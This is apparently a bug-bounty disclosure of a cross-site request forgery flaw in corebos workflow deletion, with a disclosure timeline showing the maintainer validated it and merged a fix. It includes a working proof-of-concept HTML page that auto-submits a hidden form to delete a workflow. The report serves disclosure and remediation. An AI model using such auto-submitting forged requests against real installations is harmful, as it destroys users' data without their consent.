Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Oct 18th 2021


Description

Hey Corebos team

An attacker able to delete a workFlow as there isn't exist any CSRF token for it.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.corebos.com/index.php">
      <input type="hidden" name="module" value="com&#95;vtiger&#95;workflow" />
      <input type="hidden" name="action" value="deleteworkflow" />
      <input type="hidden" name="workflow&#95;id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

after that you open the PoC.html file the workflow with id equal to 27 will be deleted.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a month ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a month ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a month ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a month ago
Joe Bordes validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 40e22c a month ago
Joe Bordes has been awarded the fix bounty